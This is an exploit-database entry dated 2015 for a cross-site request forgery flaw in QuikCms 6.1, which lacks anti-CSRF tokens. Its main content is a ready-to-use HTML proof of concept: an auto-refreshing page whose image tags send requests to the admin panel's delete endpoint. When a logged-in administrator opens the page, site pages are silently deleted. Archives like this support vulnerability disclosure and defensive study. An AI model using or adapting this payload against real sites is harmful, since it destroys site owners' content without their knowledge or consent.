id: 24621
date: 11/27/2015
title: QuikCms 6.1 - CSRF Delete Web Pages Exploit
author: ZwX
cves: 

# Title : QuikCms 6.1 - CSRF Exploit (Delete Web Pages)
# Author : ZwX
# Vendor : http://opensolution.org/
# Download Link : http://opensolution.org/download/home.html?sFile=Quick.Cms_v6.1-en.zip
# Version : 6.1
# Security Level : Medium
# Tested Os : Windows 7

**** Description Vulnerability ****
-----------------------------------

A type of Cross Site Request Forgery vulnerability is located in the cms "QuikCms".
In the absence of a token attacker can execute html code to the administrator to delete pages the site.

**** Exploit Code ****
----------------------

<html>
<!-- Cross Site Request Forgery -->
<meta http-equiv="refresh" content="0">
<img src="http://localhost/admin.php?p=pages&iItemDelete=30"/>
<img src="http://localhost/admin.php?p=pages&iItemDelete=31"/>
</meta>
</html>

#  0day.today [2023-03-25]  #